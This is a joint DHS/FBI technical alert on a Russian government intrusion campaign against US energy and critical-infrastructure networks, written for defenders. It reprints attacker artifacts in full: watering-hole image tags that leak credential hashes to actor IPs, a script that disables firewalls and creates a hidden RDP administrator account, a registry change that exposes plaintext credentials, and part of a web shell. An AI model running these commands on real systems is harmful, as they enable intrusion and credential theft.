This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.
- Domain Controllers
- File Servers
- Email Servers
DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).
For a downloadable copy of IOC packages and associated files, see:
Contact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.
Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.
Analysis by DHS and FBI, resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign.
This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”
The threat actors in this campaign employed a variety of TTPs, including
- spear-phishing emails (from compromised legitimate account),
- watering-hole domains,
- credential gathering,
- open-source and network reconnaissance,
- host-based exploitation, and
- targeting industrial control system (ICS) infrastructure.
Using Cyber Kill Chain for Analysis
DHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors’ activities within this framework.
Stage 1: Reconnaissance
The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.
Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.
Stage 2: Weaponization
Spear-Phishing Email TTPs
Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication.
Use of Watering Hole Domains
|<img src=”file[:]//62.8.193[.]206/main_logo.png” style=”height: 1px; width: 1px;” />|
|var i = document.createElement(“img”);
i.src = “file[:]//184.154.150[.]66/ame_icon.png”;
i.width = 3;
Stage 3: Delivery
When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled “document.pdf. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)
In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment.
Stage 4: Exploitation
The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects to http://bit[.]ly/2m0x8IH link, which redirected to http://tinyurl[.]com/h3sdqck link, which redirected to the ultimate destination of http://imageliners[.]com/nitel. The imageliner[.]com website contained input fields for an email address and password mimicking a login page for a website.
When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign.
Stage 5: Installation
The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets.
Establishing Local Accounts
The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in “C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\”.
Contents of symantec_help.jsp
<% Runtime.getRuntime().exec(“cmd /C \”” + System.getProperty(“user.dir”) + “\\..\\webapps\\ROOT\\<enu.cmd>\””); %>
The script “enu.cmd” created an administrator account, disabled the host-based firewall, and globally opened port 3389 for Remote Desktop Protocol (RDP) access. The script then attempted to add the newly created account to the administrators group to gain elevated privileges. This script contained hard-coded values for the group name “administrator” in Spanish, Italian, German, French, and English.
Contents of enu.cmd
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off
reg add “HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List” /v 3389:TCP /t REG_SZ /d “3389:TCP:*:Enabled:Remote Desktop” /f
reg add “HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List” /v 3389:TCP /t REG_SZ /d “3389:TCP:*:Enabled:Remote Desktop” /f
reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core” /v EnableConcurrentSessions /t REG_DWORD /d 1 /f
reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v EnableConcurrentSessions /t REG_DWORD /d 1 /f
reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v AllowMultipleTSSessions /t REG_DWORD /d 1 /f
reg add “HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services” /v MaxInstanceCount /t REG_DWORD /d 100 /f
net user MS_BACKUP <Redacted_Password> /add
net localgroup Administrators /add MS_BACKUP
net localgroup Administradores /add MS_BACKUP
net localgroup Amministratori /add MS_BACKUP
net localgroup Administratoren /add MS_BACKUP
net localgroup Administrateurs /add MS_BACKUP
net localgroup “Remote Desktop Users” /add MS_BACKUP
net user MS_BACKUP /expires:never
reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v MS_BACKUP /t REG_DWORD /d 0 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
sc config termservice start= auto
net start termservice
DHS observed the threat actors using this and similar scripts to create multiple accounts within staging target networks. Each account created by the threat actors served a specific purpose in their operation. These purposes ranged from the creation of additional accounts to cleanup of activity. DHS and FBI observed the following actions taken after the creation of these local accounts:
Account 1: Account 1 was named to mimic backup services of the staging target. This account was created by the malicious script described earlier. The threat actor used this account to conduct open-source reconnaissance and remotely access intended targets.
Account 2: Account 1 was used to create Account 2 to impersonate an email administration account. The only observed action was to create Account 3.
Account 3: Account 3 was created within the staging victim’s Microsoft Exchange Server. A PowerShell script created this account during an RDP session while the threat actor was authenticated as Account 2. The naming conventions of the created Microsoft Exchange account followed that of the staging target (e.g., first initial concatenated with the last name).
Account 4: In the latter stage of the compromise, the threat actor used Account 1 to create Account 4, a local administrator account. Account 4 was then used to delete logs and cover tracks.
In addition, the threat actors created a scheduled task named reset, which was designed to automatically log out of their newly created account every eight hours.
After achieving access to staging targets, the threat actors installed tools to carry out operations against intended victims. On one occasion, threat actors installed the free version of FortiClient, which they presumably used as a VPN client to connect to intended target networks.
Password Cracking Tools
Consistent with the perceived goal of credential harvesting, the threat actors dropped and executed open source and free tools such as Hydra, SecretsDump, and CrackMapExec. The naming convention and download locations suggest that these files were downloaded directly from publically available locations such as GitHub. Forensic analysis indicates that many of these tools were executed during the timeframe in which the actor was accessing the system. Of note, the threat actors installed Python 2.7 on a compromised host of one staging victim, and a Python script was seen at C:\Users\<Redacted Username>\Desktop\OWAExchange\.
Once inside of an intended target’s network, the threat actor downloaded tools from a remote server. The initial versions of the file names contained .txt extensions and were renamed to the appropriate extension, typically .exe or .zip.
In one example, after gaining remote access to the network of an intended victim, the threat actor carried out the following actions:
- The threat actor connected to 91.183.104[.]150 and downloaded multiple files, specifically the file INST.txt.
- The files were renamed to new extensions, with INST.txt being renamed INST.exe.
- The files were executed on the host and then immediately deleted.
- The execution of INST.exe triggered a download of ntdll.exe, and shortly after, ntdll.exe appeared in the running process list of the compromised system of an intended target.
- The registry value “ntdll” was added to the “HKEY_USERS\<USER SID>\Software\Microsoft\Windows\CurrentVersion\Run” key.
Persistence Through .LNK File Manipulation
The threat actors manipulated LNK files, commonly known as a Microsoft Window’s shortcut file, to repeatedly gather user credentials. Default Windows functionality enables icons to be loaded from a local or remote Windows repository. The threat actors exploited this built-in Windows functionality by setting the icon path to a remote server controller by the actors. When the user browses to the directory, Windows attempts to load the icon and initiate an SMB authentication session. During this process, the active user’s credentials are passed through the attempted SMB connection.
Four of the observed LNK files were “SETROUTE.lnk”, “notepad.exe.lnk”, “Document.lnk” and “desktop.ini.lnk”. These names appeared to be contextual, and the threat actor may use a variety of other file names while using this tactic. Two of the remote servers observed in the icon path of these LNK files were 62.8.193[.]206 and 5.153.58[.]45. Below is the parsed content of one of the LNK files:
Parsed output for file: desktop.ini.lnk
The threat actor would modify key systems to store plaintext credentials in memory. In one instance, the threat actor executed the following command.
|reg add “HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest” /v UseLogonCredential /t REG_DWORD /d 1 /f|
Stage 6: Command and Control
The threat actors commonly created web shells on the intended targets’ publicly accessible email and web servers. The threat actors used three different filenames (“global.aspx, autodiscover.aspx and index.aspx) for two different webshells. The difference between the two groups was the “public string Password” field.
Beginning Contents of the Web Shell
<%@ Page Language=”C#” Debug=”true” trace=”false” validateRequest=”false” EnableViewStateMac=”false” EnableViewState=”true”%>
<%@ import Namespace=”System”%>
<%@ import Namespace=”System.IO”%>
<%@ import Namespace=”System.Diagnostics”%>
<%@ import Namespace=”System.Data”%>
<%@ import Namespace=”System.Management”%>
<%@ import Namespace=”System.Data.OleDb”%>
<%@ import Namespace=”Microsoft.Win32″%>
<%@ import Namespace=”System.Net.Sockets” %>
<%@ import Namespace=”System.Net” %>
<%@ import Namespace=”System.Runtime.InteropServices”%>
<%@ import Namespace=”System.DirectoryServices”%>
<%@ import Namespace=”System.ServiceProcess”%>
<%@ import Namespace=”System.Text.RegularExpressions”%>
<%@ Import Namespace=”System.Threading”%>
<%@ Import Namespace=”System.Data.SqlClient”%>
<%@ import Namespace=”Microsoft.VisualBasic”%>
<%@ Import Namespace=”System.IO.Compression” %>
<%@ Assembly Name=”System.DirectoryServices,Version=22.214.171.124,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A”%>
<%@ Assembly Name=”System.Management,Version=126.96.36.199,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A”%>
<%@ Assembly Name=”System.ServiceProcess,Version=188.8.131.52,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A”%>
<%@ Assembly Name=”Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a”%>
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<script runat = “server”>
public string Password = “<REDACTED>”;
public string z_progname = “z_WebShell”;
Stage 7: Actions on Objectives
DHS and FBI identified the threat actors leveraging remote access services and infrastructure such as VPN, RDP, and Outlook Web Access (OWA). The threat actors used the infrastructure of staging targets to connect to several intended targets.
Upon gaining access to intended victims, the threat actors conducted reconnaissance operations within the network. DHS observed the threat actors focusing on identifying and browsing file servers within the intended victim’s network.
Once on the intended target’s network, the threat actors used privileged credentials to access the victim’s domain controller typically via RDP. Once on the domain controller, the threat actors used the batch scripts “dc.bat” and “dit.bat” to enumerate hosts, users, and additional information about the environment. The observed outputs (text documents) from these scripts were:
The threat actors also collected the files “ntds.dit” and the “SYSTEM” registry hive. DHS observed the threat actors compress all of these files into archives named “SYSTEM.zip” and “comps.zip”.
The threat actors used Windows’ scheduled task and batch scripts to execute “scr.exe” and collect additional information from hosts on the network. The tool “scr.exe” is a screenshot utility that the threat actor used to capture the screen of systems across the network. The MD5 hash of “scr.exe” matched the MD5 of ScreenUtil, as reported in the Symantec Dragonfly 2.0 report.
In at least two instances, the threat actors used batch scripts labeled “pss.bat” and “psc.bat” to run the PsExec tool. Additionally, the threat actors would rename the tool PsExec to “ps.exe”.
- The batch script (“pss.bat” or “psc.bat”) is executed with domain administrator credentials.
- The directory “out” is created in the user’s %AppData% folder.
- PsExec is used to execute “scr.exe” across the network and to collect screenshots of systems in “ip.txt”.
- The screenshot’s filename is labeled based on the computer name of the host and stored in the target’s C:\Windows\Temp directory with a “.jpg” extension.
- The screenshot is then copied over to the newly created “out” directory of the system where the batch script was executed.
- In one instance, DHS observed an “out.zip” file created.
DHS observed the threat actors create and modify a text document labeled “ip.txt” which is believed to have contained a list of host information. The threat actors used “ip.txt” as a source of hosts to perform additional reconnaissance efforts. In addition, the text documents “res.txt” and “err.txt” were observed being created as a result of the batch scripts being executed. In one instance, “res.txt” contained output from the Windows’ command “query user” across the network.
|Using <Username> <Password>
Running -s cmd /c query user on <Hostname1>
Running -s cmd /c query user on <Hostname2>
Running -s cmd /c query user on <Hostname3>
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
<user1> 2 Disc 1+19:34 6/27/2017 12:35 PM
An additional batch script named “dirsb.bat” was used to gather folder and file names from hosts on the network.
In addition to the batch scripts, the threat actors also used scheduled tasks to collect screenshots with “scr.exe”. In two instances, the scheduled tasks were designed to run the command “C:\Windows\Temp\scr.exe” with the argument “C:\Windows\Temp\scr.jpg”. In another instance, the scheduled task was designed to run with the argument “pss.bat” from the local administrator’s “AppData\Local\Microsoft\” folder.
The threat actors commonly executed files out of various directories within the user’s AppData or Downloads folder. Some common directory names were
- Temp, and
Targeting of ICS and SCADA Infrastructure
In multiple instances, the threat actors accessed workstations and servers on a corporate network that contained data output from control systems within energy generation facilities. The threat actors accessed files pertaining to ICS or supervisory control and data acquisition (SCADA) systems. Based on DHS analysis of existing compromises, these files were named containing ICS vendor names and ICS reference documents pertaining to the organization (e.g., “SCADA WIRING DIAGRAM.pdf” or “SCADA PANEL LAYOUTS.xlsx”).
The threat actors targeted and copied profile and configuration information for accessing ICS systems on the network. DHS observed the threat actors copying Virtual Network Connection (VNC) profiles that contained configuration information on accessing ICS systems. DHS was able to reconstruct screenshot fragments of a Human Machine Interface (HMI) that the threat actors accessed.
NCCIC will conduct a series of webinars on Russian government cyber activity against critical infrastructure (as detailed in NCCIC Alert TA18-074A), which will feature NCCIC subject matter experts discussing recent cybersecurity incidents, mitigation techniques, and resources that are available to help protect critical assets.
The same webinar will be held from 1-2:30 p.m. ET on the dates listed below:
- Monday, July 23
- Wednesday, July 25
- Monday, July 30
- Wednesday, August 1
NCCIC encourages users and administrators to attend one of the webinar sessions by visiting https://share.dhs.gov/nccicbriefings or dialing 1-888-221-6227 (audio only). Attendees may access the webinar as a guest on the day of each event; a registered account is not required for attendees to join.